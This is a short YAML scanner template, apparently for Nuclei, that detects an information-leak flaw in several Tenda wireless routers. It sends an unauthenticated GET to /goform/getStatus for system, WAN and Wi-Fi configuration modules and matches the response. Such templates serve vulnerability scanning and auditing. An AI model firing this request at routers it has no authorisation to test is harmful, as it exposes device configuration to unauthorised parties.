id: Tenda-leakage

info:
  name: 腾达多款无线路由器 getStatus 参数存在信息泄漏漏洞
  author: Str1am
  severity: medium
  tags: Tenda,leakage

requests:
  - method: GET
    path:
      - "{{BaseURL}}/goform/getStatus?random=&modules=internetStatus%2CdeviceStatistics%2CsystemInfo%2CwanAdvCfg%2CwifiRelay%2CwifiBasicCfg%2CsysTime"
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - "wifiBasicCfg"
          - "sysTime"
        part: body
        condition: and
